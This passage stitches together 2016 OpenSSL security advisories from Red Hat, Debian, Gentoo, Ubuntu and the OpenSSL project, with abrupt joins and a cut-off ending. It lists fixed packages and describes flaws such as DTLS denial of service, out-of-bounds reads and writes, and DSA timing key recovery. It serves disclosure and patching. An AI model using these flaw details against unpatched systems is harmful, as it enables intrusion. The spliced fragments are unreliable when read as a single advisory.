6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2j \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there 